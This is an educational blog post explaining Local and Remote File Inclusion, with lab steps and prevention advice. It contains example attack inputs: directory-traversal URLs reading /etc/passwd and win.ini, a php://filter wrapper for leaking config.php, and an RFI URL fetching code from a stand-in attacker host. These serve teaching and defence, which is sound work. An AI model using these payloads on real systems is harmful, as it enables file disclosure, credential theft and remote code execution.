Introduction
In this part of the cybersecurity series, we will explore a critical web vulnerability known as File Inclusion.
File Inclusion occurs when a web application allows users to control which files are loaded or executed on the server without proper validation.
This vulnerability can lead to sensitive data exposure or even full server compromise.
What is File Inclusion?
File Inclusion is a vulnerability where an application includes files based on user input without proper validation or restrictions.
There are two main types of File Inclusion vulnerabilities:
Local File Inclusion (LFI)
Remote File Inclusion (RFI)
1. Local File Inclusion (LFI)
LFI allows an attacker to access and sometimes execute files that are stored on the local server.
How LFI Works
Consider a website that loads pages using a parameter:
https://example.com/view.php?page=contact.php
If the application is vulnerable, an attacker can manipulate the parameter:
https://example.com/view.php?page=../../../../etc/passwd
👉 This may expose sensitive system files such as /etc/passwd.
2. Remote File Inclusion (RFI)
RFI is a more dangerous variant where an attacker can include external files from a remote server.
How RFI Works
https://example.com/view.php?page=http://attacker.com/malicious.txt
If vulnerable, the server may fetch and execute the remote file, potentially leading to Remote Code Execution (RCE).
Hands-on Lab Methodology
When practicing in security labs, follow these steps:
1. Identify Parameters
Look for inputs like:
page=
file=
include=
lang=
2. Directory Traversal Test
Try:
../../../../etc/passwd
For Windows systems:
../../../../windows/win.ini
3. PHP Wrapper Technique
Sometimes direct reading is blocked. Try:
php://filter/convert.base64-encode/resource=config.php
This can reveal source code in encoded form.
Impact of File Inclusion Attacks
File Inclusion vulnerabilities can lead to:
Sensitive file disclosure
Source code leakage
Credential exposure
Remote code execution
Full server compromise
How to Prevent File Inclusion
✔ Avoid User-Controlled File Paths
Never allow user input to directly control file inclusion.
✔ Use Whitelisting
Only allow predefined and safe file names.
✔ Restrict File Permissions
Run servers with minimal privileges.
✔ Disable Remote File Inclusion
In PHP configuration:
allow_url_include = Off
Conclusion
File Inclusion (LFI and RFI) is a highly dangerous vulnerability that can lead to full system compromise if not properly handled.
Understanding directory traversal and input validation is essential for every ethical hacker and penetration tester.
Final Note
Always practice File Inclusion vulnerabilities only in authorized labs and legal environments.

Comments
Post a Comment